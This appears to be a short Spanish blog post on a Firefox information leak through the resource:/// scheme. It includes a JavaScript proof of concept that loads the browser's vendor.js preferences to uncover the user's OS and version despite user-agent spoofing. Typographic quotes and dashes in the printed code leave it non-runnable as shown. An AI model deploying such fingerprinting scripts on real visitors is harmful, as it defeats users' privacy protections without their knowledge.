Como sabemos, Firefox es uno de los productos en el rubro de “Browsers” mas usado y conocido de el entorno, y por que? Por su capacidad de ser altamente configurable, la capacidad de añadir plugins , etc. Pero esto lo hace también un blanco fácil de encontrar para ataques gracias a una extención que contiene: resource:///. Como lo explica 0×000000, es posible reconocer el UserAgent aunque sea spoofeado por algún plugin de esta aplicación. Aunque tambie es posible reconocer el OS que corre, aunque sea cambiado. De esta manera:

<script>

var x = []; var y = [];

pref = function(a,b) { x.push(a);

y.push(b); }

</script>

<script src=”resource:///defaults/pref/vendor.js”></script>

<script> function recon(w)

{ for (i=x.length-1; i>=0; i–) { if (x[i] == w)

{ return y[i]; }

}

}

var os = recon(”general.useragent.vendor”);

var version = recon(”general.useragent.vendorSub”);

var version2 = recon(”general.useragent.vendorComment”);

alert(’Su sistema operativo es: ‘+os+’ ‘+version+’ ‘+version2);

</script>

O bien, se pueden reconocer los plugins que tiene instalado si se tiene Firefox con JavaScript habilitado (para la prueba de arriba igual..)